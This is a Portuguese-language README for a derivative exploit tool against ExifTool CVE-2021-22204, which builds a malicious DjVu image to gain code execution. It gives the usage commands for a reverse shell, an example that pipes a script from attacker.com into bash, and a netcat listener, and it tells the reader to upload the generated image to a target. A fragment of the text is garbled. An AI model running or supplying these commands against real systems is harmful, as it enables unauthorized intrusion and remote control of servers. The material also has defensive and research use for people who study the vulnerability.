
Exploit de RCE no ExifTool (CVE-2021-22204) - versão melhorada, sem dependência do exiftool
Uma prova de conceito aprimorada para CVE-2021-22204, uma vulnerabilidade nas versões 7.44 a 12.23 do ExifTool que permite execução arbitrária de código ao processar arquivos DjVu maliciosos.
Este é um trabalho derivado. A vulnerabilidade e o exploit original não são meus.
| Papel | Quem |
|---|
| Vulnerabilidade descoberta por | William Bowling (@wcbowling), reportada através do programa de bug bounty do GitLab — Abril de 2021 |
| PoC original por | UNICORD (NicPWNs & Dev-Yeoj) |
| Modificações neste repositório por | d4ytox |
A neutralização inadequada de dados do usuário no formato de arquivo DjVu nas versões 7.44 a 12.23 do ExifTool permite execução arbitrária de código ao analisar uma imagem maliciosa. Este exploit gera um arquivo de imagem malicioso que, quando processado por uma versão vulnerável do ExifTool, executa código controlado pelo atacante.
Com base em UNICORDev/exploit-CVE-2021-22204:
exiftool -config para incorporar o payload, o que falha se o seu próprio ExifTool estiver corrigido (v12.24+). Esta versão constrói um payload DjVu puro usando apenas djvumake.\c)djvulibre-binEstas são alterações de engenharia em um exploit existente. Nenhuma pesquisa de vulnerabilidade é reivindicada.
sudo apt install djvulibre-bin
Reverse Shell:
python3 exploit.py -s <LHOST> <LPORT>
Comando Personalizado:
python3 exploit.py -c "id > /tmp/pwned"
Exemplos:
# Gerar payload de reverse shell
python3 exploit.py -s 192.168.1.100 4444
# Gerar payload de execução de comando
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Iniciar listener e aguardar callback
nc -nlvp 4444
O exploit gera image.jpg - envie este arquivo para um alvo onde o ExifTool irá processá-lo.
Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use este exploit apenas contra sistemas que você possui ou para os quais tenha permissão escrita explícita para testar.
O acesso não autorizado a sistemas de computador é ilegal e punível por lei. Use com responsabilidade.
MIT, aplicando-se apenas às modificações neste repositório. O PoC upstream não possui licença, portanto permanece com todos os direitos reservados aos seus autores. Consulte LICENSE para o aviso completo de atribuição.